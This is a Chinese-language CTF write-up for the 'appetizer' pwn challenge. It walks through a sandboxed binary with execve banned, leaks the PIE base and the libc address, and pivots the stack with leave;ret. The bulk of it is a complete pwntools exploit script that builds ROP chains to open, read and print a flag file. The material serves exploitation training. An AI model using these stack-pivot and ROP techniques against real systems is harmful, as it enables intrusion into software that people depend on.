程序分析
- 开启了沙盒ban了execve
- fun函数可以覆盖到rbp的位置
- check函数会检查该位置是否有下面的字符串,小端序记得反过来写
- 白给了程序的一个地址(end),通过减去偏移拿到程序的基地址
- 调试发现最后一个read可以改写rbp以及rsp
思路
- func函数可以让我们改写rbp,且通过最后一个read可以实现任意地址写入0x10的数据,但是开启了pie,且我们是后面才拿到的程序基地址且禁止了系统调用,所以打orw
- 将rop链布置到end中,泄露出libc地址,通过最后一个read进行栈迁移
- 在第一个链中输出完之后再执行一个read向end写入第二个rop链
- 第二个rop链就是常规的open,read,puts了
注:orw:在这里指代程序开启了orw,采用open打开flag再写入内存,最后输出的利用
exp
from pwn import *
context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',29430)
c=process(b'./appetizer')
libc=ELF(b'./libs/2.31-0ubuntu9_amd64/libc-2.31.so')
elf=ELF(b'./appetizer')
gdb.attach(c,'''
''')
c.sendafter(b'identity\n',b'aaNameless')
c.recvuntil(b'are:')
addr_base=int(c.recv(14),16)-0x4050
pop_rdi=addr_base+0x14d3
pop_rsi_xxx=addr_base+0x14d1
leave_ret=addr_base+0x12d8
ret=addr_base+0x101a
write_got=elf.got['write']
write_plt=elf.plt['write']
end=addr_base+0x4050
#length=0xe0
py=p64(pop_rdi)+p64(1)+p64(pop_rsi_xxx)+p64(addr_base+write_got)+p64(0)+p64(addr_base+write_plt)+p64(ret)*21+p64(addr_base+0x1428)
#start_length=0xe0
py+=p64(end-8)+p64(leave_ret)+p64(0)
#start_length=0xf8
py+=b'./flag\x00\x00'
c.sendafter(b'on it\n',py)
py=p64(end-8)+p64(leave_ret)
c.sendafter(b'wish:\n',py)
libc_base=u64(c.recv(6).ljust(8,b'\x00'))-libc.sym['write']
log.success("libc_base="+hex(libc_base))
pop_rsi=libc_base+0x27529
pop_rdx_xxx=libc_base+0x11c1e1
open_addr=libc_base+libc.sym['open']
read_addr=libc_base+libc.sym['read']
puts_addr=libc_base+libc.sym['puts']
orw=p64(pop_rdi)+p64(end+0xf8)+p64(pop_rsi)+p64(0)+p64(open_addr)
orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(end+0x100)+p64(pop_rdx_xxx)+p64(0x40)+p64(0)+p64(read_addr)
orw+=p64(pop_rdi)+p64(end+0x100)+p64(puts_addr)
c.send(orw)
c.send(b'a')
c.interactive()
others部分
- 官方给出的第一个wp利用的是csu,应该是为了控制rdx,但是我们泄露libc的时候最后一个read存入rdx的值为0x10完全够用所以就不用csu了
- 第一个rop链中的大量ret目的是抬高栈,原因是第一条链布置完执行的read的时候,我们又是在同一个地方写入内容导致改写了read后面返回时布置的内容,这会导致程序出错,如果把p64(ret)*21删除则,read后rip拿到的值就是我们第二条链中的3